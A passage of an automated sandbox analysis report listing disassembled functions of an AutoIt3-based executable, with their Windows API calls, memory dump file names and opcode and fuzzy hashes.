                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2710830443-0
                                                                                                                                                                                      • Opcode ID: 8dcccc281c545a10615d171135266328d3246f2b2e8c03d45dd32c7c6d092ab8
                                                                                                                                                                                      • Instruction ID: 0b7f4cd28f2b01abb2856377df7a3800795ed1aa7d9595f64e08d84fc202c028
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dcccc281c545a10615d171135266328d3246f2b2e8c03d45dd32c7c6d092ab8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 25E06D3110B228BADB201FA2EC0EEDB7F2CEF117B1F008010B51D850A0DA759580DBA0
                                                                                                                                                                                      Function 0091B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 0091B0C5
                                                                                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 0091B0CF
                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0091B0E4
                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 0091B0EC
                                                                                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 0097ECFA
                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0097ED07
                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0097ED20
                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0097ED39
                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0097ED59
                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0097ED64
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1946975507-0
                                                                                                                                                                                      • Opcode ID: 4296142ed27681e77642595245b4d1eadb9f4ef22a49cd771727ef5dc138b9fa
                                                                                                                                                                                      • Instruction ID: 9d166e0e629097ebee4e718f6d98cf02dc0cf76ebc2fcf426dc478cd1fbe2548
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4296142ed27681e77642595245b4d1eadb9f4ef22a49cd771727ef5dc138b9fa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 02E06D32118240AEEF215F74AC0DBD83B26AB46335F04C266F66A980E2C3714980EB11
                                                                                                                                                                                      Function 0097C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                      • Opcode ID: 79a57dc372da0d43335c4b9c81f700e9ebf38d142904bcf1680a571460c70a7f
                                                                                                                                                                                      • Instruction ID: c3b404d1ddea6478db1b777c65903a651707bcd0157993c32359d5391381c980
                                                                                                                                                                                      • Opcode Fuzzy Hash: 79a57dc372da0d43335c4b9c81f700e9ebf38d142904bcf1680a571460c70a7f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 44E04FB5515208EFDB006F70CC486A93BE5EB4C361F11C805FC4AD7390EB789880AB40
                                                                                                                                                                                      Function 0093C066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0093C071
                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 0093C07D
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0093C086
                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0093C08E
                                                                                                                                                                                        • Part of subcall function 0093B850: GetProcessHeap.KERNEL32(00000000,?,0093B574), ref: 0093B857
                                                                                                                                                                                        • Part of subcall function 0093B850: HeapFree.KERNEL32(00000000), ref: 0093B85E
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                      • Opcode ID: 2390f830594c75feef310c57fadf3b7aa4531b3e33e76d81750016e82459ea5f
                                                                                                                                                                                      • Instruction ID: 4aa1f2731759003e367034944d0c1643ed3c2d9caf537cc97c2935dbdc1b57a8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2390f830594c75feef310c57fadf3b7aa4531b3e33e76d81750016e82459ea5f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 60E0B63611D006BBCB052FA5ED48859FB3AFF893217108226F625816B0CB32A831FB90
                                                                                                                                                                                      Function 0097C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                      • Opcode ID: ea9f09447d35eca99cf73dd2678291d02f3ee5ccb234bbd17a6af93e7ef2561f
                                                                                                                                                                                      • Instruction ID: 5b845b769e63735b1f9b9abc31afea9bf3dfba40e36d5ec2bb5b32bda58f86a2
                                                                                                                                                                                      • Opcode Fuzzy Hash: ea9f09447d35eca99cf73dd2678291d02f3ee5ccb234bbd17a6af93e7ef2561f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 59E04FB5515208EFDB006F70CC486593BE5EB4C360F118405FD4AD7390EB7899809B40
                                                                                                                                                                                      Function 00924C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 00924C3E
                                                                                                                                                                                        • Part of subcall function 009286B5: GetLastError.KERNEL32(?,00920127,009288A3,00924673,?,?,00920127,?,0090125D,00000058,?,?), ref: 009286B7
                                                                                                                                                                                        • Part of subcall function 009286B5: __calloc_crt.LIBCMT ref: 009286D8
                                                                                                                                                                                        • Part of subcall function 009286B5: GetCurrentThreadId.KERNEL32 ref: 00928701
                                                                                                                                                                                        • Part of subcall function 009286B5: SetLastError.KERNEL32(00000000,00920127,009288A3,00924673,?,?,00920127,?,0090125D,00000058,?,?), ref: 00928719
                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00924C1D), ref: 00924C52
                                                                                                                                                                                      • __freeptd.LIBCMT ref: 00924C59
                                                                                                                                                                                      • ExitThread.KERNEL32 ref: 00924C61
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 408300095-0
                                                                                                                                                                                      • Opcode ID: 3dcc0e9e0e8c1de8aa029b5405f675a79429752830c081081b657e98b5c28083
                                                                                                                                                                                      • Instruction ID: fdd3a80476b7d1ea49d66491fa9005c4a1aeb3be6f75280e61772c7b3bf0ffd6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3dcc0e9e0e8c1de8aa029b5405f675a79429752830c081081b657e98b5c28083
                                                                                                                                                                                      • Instruction Fuzzy Hash: 49D0A731407E714BC5353B24AD0D74E33549F01B25B014304E075251E4CF2458015791
                                                                                                                                                                                      Function 00982350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                      • String ID: >$DEFINE
                                                                                                                                                                                      • API String ID: 4104443479-1664449232
                                                                                                                                                                                      • Opcode ID: 924d4b22b4708984e885f8a81243e2062a1a947d262d794eecf606c5f2ab1f2d
                                                                                                                                                                                      • Instruction ID: d23861078979d80399c687cea8185e578718e247b80422ab81cdc4b170fa9ab0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 924d4b22b4708984e885f8a81243e2062a1a947d262d794eecf606c5f2ab1f2d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B126B75A0020ADFCF24DF98C490AADB7B5FF49310F25865AE859AB391D734AD81CB90
                                                                                                                                                                                      Function 0093EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0093ECA0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ContainedObject
                                                                                                                                                                                      • String ID: AutoIt3GUI$Container
                                                                                                                                                                                      • API String ID: 3565006973-3941886329
                                                                                                                                                                                      • Opcode ID: 28f5e13c81523e8aec8091c6a300866fe652043b32bb6c410c14cd4b9a2411bc
                                                                                                                                                                                      • Instruction ID: 090370f3cee76ef66c63ece641c71fed0d2d38f1835e59d97743d8975796348a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 28f5e13c81523e8aec8091c6a300866fe652043b32bb6c410c14cd4b9a2411bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 209105746007019FDB14DF64C884B6ABBF9BF89710F24896DE95ACB291DBB0E841CF60
                                                                                                                                                                                      Function 0094E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00903BCF: _wcscpy.LIBCMT ref: 00903BF2
                                                                                                                                                                                        • Part of subcall function 009084A6: __swprintf.LIBCMT ref: 009084E5
                                                                                                                                                                                        • Part of subcall function 009084A6: __itow.LIBCMT ref: 00908519
                                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 0094E785
                                                                                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0094E84E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                                      • String ID: LPT
                                                                                                                                                                                      • API String ID: 3222508074-1350329615
                                                                                                                                                                                      • Opcode ID: 88033c4706d43a000754691b774ab2f66fdad9631453476fdf28a61765590fd1
                                                                                                                                                                                      • Instruction ID: 67c9dd2f69cbe4ad33e06e07eff8a404a106f43104388df4984283f36a8920c1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 88033c4706d43a000754691b774ab2f66fdad9631453476fdf28a61765590fd1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C616D75A00219AFCF14DF98C895EAEB7B9BF48310F054069F546AB3A1DB30AE40CB50
                                                                                                                                                                                      Function 00901B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00901B83
                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 00901B9C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                                      • Opcode ID: 6bf45371ee7f9f857a264783607f9dc9223772d1d7ea896b4adedb286eaab1e1
                                                                                                                                                                                      • Instruction ID: a7020d2c3584be36334d520bb482628f31fdf0f5d5b68f38eb08cf9f0bf1d969
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bf45371ee7f9f857a264783607f9dc9223772d1d7ea896b4adedb286eaab1e1
                                                                                                                                                                                      • Instruction Fuzzy Hash: D2516771508748ABE320AF50D885BABBBECFFD9354F81484CF1C8410A1EB7195ACC766
                                                                                                                                                                                      Function 0094CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0090417D: __fread_nolock.LIBCMT ref: 0090419B
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0094CF49
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0094CF5C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                                      • String ID: FILE
                                                                                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                                                                                      • Opcode ID: 152d9b5d9d07082c6b470a690065deaa9e37bd4b0a93064d36413abe76a8390f
                                                                                                                                                                                      • Instruction ID: a287c1b40ecc04ae63b5d8c8a863255223414f19e4f0290e54b1e1110cff89e9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 152d9b5d9d07082c6b470a690065deaa9e37bd4b0a93064d36413abe76a8390f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7041D672A04219BEDF60DBA4DC41FEF7BBDAF99710F000469F601EB191D7759A848B50
                                                                                                                                                                                      Function 0096A578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0096A668
                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0096A67D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                      • Opcode ID: 9b19be979074a24c66700bd4e1869a0b6c9534db539918567a1203323f9a6174
                                                                                                                                                                                      • Instruction ID: 1aa13508d13cc270f19a94d0d5e93198cdb817166ac88572f54c649cb3bb2b85
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b19be979074a24c66700bd4e1869a0b6c9534db539918567a1203323f9a6174
                                                                                                                                                                                      • Instruction Fuzzy Hash: C341F875A003099FDB14CF69C881BDE7BB9FB09300F14456AE905EB381D770A941DFA1
                                                                                                                                                                                      Function 009557D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 009557E7
                                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 0095581D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                                                                                      • Opcode ID: eee32e001ce96538787ba987b9099a089db5f639192689967297f954b335e7f8
                                                                                                                                                                                      • Instruction ID: c64631817e61e8a31526fe3f24ae83cb8c854e01224679a7b689a70a2be3b52a
                                                                                                                                                                                      • Opcode Fuzzy Hash: eee32e001ce96538787ba987b9099a089db5f639192689967297f954b335e7f8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F311871900119EFCF11EFA1DC95AEF7FB8FF58300F104015E915A6162DA319A5ADB60
                                                                                                                                                                                      Function 00969567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 0096961B
                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00969657
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                      • Opcode ID: 207394aff9d85d59d494b56b6b63cbd8ba81acd62d14fc481f861dc8afeccc63
                                                                                                                                                                                      • Instruction ID: 7318d095096688ae9e43d5ecf4b36f2fed63c3595ad8a14807f487383b6fc04f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 207394aff9d85d59d494b56b6b63cbd8ba81acd62d14fc481f861dc8afeccc63
                                                                                                                                                                                      • Instruction Fuzzy Hash: D1319E31500204AEEB109F68DC80FFB77ADFF88764F108519F8AAC7190DA31AC91DB64
                                                                                                                                                                                      Function 00945B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 00945BE4
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00945C1F
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
